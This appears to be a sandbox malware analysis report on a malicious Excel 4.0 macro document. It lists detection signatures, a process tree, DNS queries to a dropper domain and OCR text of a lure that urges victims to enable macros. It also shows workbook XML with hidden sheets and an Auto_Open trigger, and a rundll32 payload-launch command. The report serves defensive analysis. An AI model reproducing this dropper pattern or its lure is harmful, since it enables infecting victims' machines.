Loading ...

Play interactive tourEdit tour

Analysis Report Refusal-1605078281-01212021.xlsm

Overview

General Information

Sample Name:Refusal-1605078281-01212021.xlsm
Analysis ID:343115
MD5:6b11147a8eb468cb247d32f4be0f7469
SHA1:ff599ff7ed480bf2485e1b85aed7e8c6bbe7aeec
SHA256:2fc494967112688b5cf699386bbab79f9d23cc03527769adc932739a0be93094

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Outdated Microsoft Office dropper detected
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected MalDoc_1
Checks for available system drives (often done to infect USB drives)
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6140 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4856 cmdline: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet2.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, CommandLine: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6140, ProcessCommandLine: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, ProcessId: 4856

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for domain / URLShow sources
    Source: leafybuy.comVirustotal: Detection: 6%Perma Link

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: z:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: x:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: v:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: t:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: r:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: p:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: n:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: l:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: j:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: h:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: f:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: b:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: y:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: w:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: u:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: s:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: q:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: o:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: m:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: k:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: i:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: g:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: e:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: c:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: a:Jump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: leafybuy.com

    Networking:

    barindex
    Outdated Microsoft Office dropper detectedShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: leafybuy.com is down
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: leafybuy.com is down
    Yara detected MalDoc_1Show sources
    Source: Yara matchFile source: sheet2.xml, type: SAMPLE
    Source: unknownDNS traffic detected: query: leafybuy.com replaycode: Server failure (2)
    Source: unknownDNS traffic detected: queries for: leafybuy.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.cortana.ai
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.office.net
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.onedrive.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://augloop.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://cdn.entity.
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://cortana.ai
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://cortana.ai/api
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://cr.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://directory.services.
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://graph.windows.net
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://graph.windows.net/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://login.windows.local
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://management.azure.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://management.azure.com/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://messaging.office.com/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://officeapps.live.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://onedrive.live.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://outlook.office.com/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://settings.outlook.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://tasks.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 i 12" from the yellow bar above , , , 13 14" @Once You have Enable Editing, pl
    Source: Screenshot number: 4Screenshot OCR: Enable Content 15 from the yellow bar above 16 17 "- WHY ICANNOT OPEN THIS DOCUMENT? 19 20 21
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 12" from the yellow bar above 13 14" @Once You have Enable Editing, please cli
    Source: Screenshot number: 8Screenshot OCR: Enable Content 15 from the yellow bar above 16 O 0 17 " WHY I CANNOT OPEN THIS DOCUMENT? 19 20
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Refusal-1605078281-01212021.xlsmInitial sample: EXEC
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9302"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="5" r:id="rId1"/><sheet name="Kotu" sheetId="4" state="hidden" r:id="rId2"/><sheet name="Mols" sheetId="1" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Kotu!$A$154</definedName></definedNames><calcPr calcId="144525"/></workbook>
    Source: classification engineClassification label: mal80.troj.expl.evad.winXLSM@3/10@2/0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{A2B54A76-FE4D-48DF-B493-75FF5A1D3D7D} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServerJump to behavior
